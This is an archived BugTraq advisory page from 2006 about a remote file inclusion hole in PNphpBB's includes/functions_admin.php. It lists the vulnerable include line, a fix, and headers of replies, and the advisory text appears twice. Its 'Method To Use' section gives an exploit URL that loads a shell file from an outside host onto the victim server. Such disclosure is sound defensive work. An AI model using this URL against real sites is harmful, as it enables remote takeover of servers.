BugTraq
Back to list
|
Post reply
AzzCoder => PNphpBB (Latest) Remote File Include
Sep 18 2006 03:28AM
azzcoder hotmail com
(1 replies)
Vendor: http://www.pnphpbb.com/
Vulnerable File: includes/functions_admin.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );
Method To Use:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root
_path=http://yourdomain.com/shell.txt?
How To Fix:
Add this code before the include
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
}
[ reply ]
Re: AzzCoder => PNphpBB (Latest) Remote File Include
Sep 20 2006 09:12PM
Carsten Eilers (ceilers-lists gmx de)
(1 replies)
Re: AzzCoder => PNphpBB (Latest) Remote File Include
Sep 21 2006 04:16PM
str0ke (str0ke milw0rm com)
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable File: includes/functions_admin.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );
Method To Use:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root
_path=http://yourdomain.com/shell.txt?
How To Fix:
Add this code before the include
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
}
[ reply ]